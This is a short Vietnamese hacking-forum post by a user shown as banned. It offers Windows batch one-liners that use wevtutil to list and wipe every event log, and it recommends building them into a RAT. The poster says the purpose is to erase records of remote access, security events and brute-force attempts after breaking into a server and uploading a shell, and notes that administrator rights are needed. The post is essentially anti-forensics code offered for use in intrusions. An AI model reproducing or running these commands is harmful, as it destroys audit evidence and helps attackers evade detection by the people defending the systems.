Phanonra
Banned
-
07/11/2013
-
1
-
205 bài viết
Script hay nên tích hợp vào RAT ...
PHP:
C:\windows\system32\cmd.exe /c for /f %x in ('wevtutil el') do wevtutil cl "%x"
PHP:
WEVTUTIL EL > .\LOGLIST.TXTfor /f %%a in ( .\LOGLIST.TXT ) do WEVTUTIL CL "%%a"del .\LOGLIST.TXT timeout 30
PHP:
for /f %%a in ('WEVTUTIL EL') do WEVTUTIL CL "%%a"
timeout 30
Cái này dùng để clear event logs
Giả sử remote vô server hack đc , up shell thành công ... Trong event logs sẽ có lưu thông tin remote , security , brute ...
Chạy thêm đoạn script đấy -> em vô tội
ps: để chạy đc , phải có quyền administrators trở lên nhé
Chỉnh sửa lần cuối bởi người điều hành: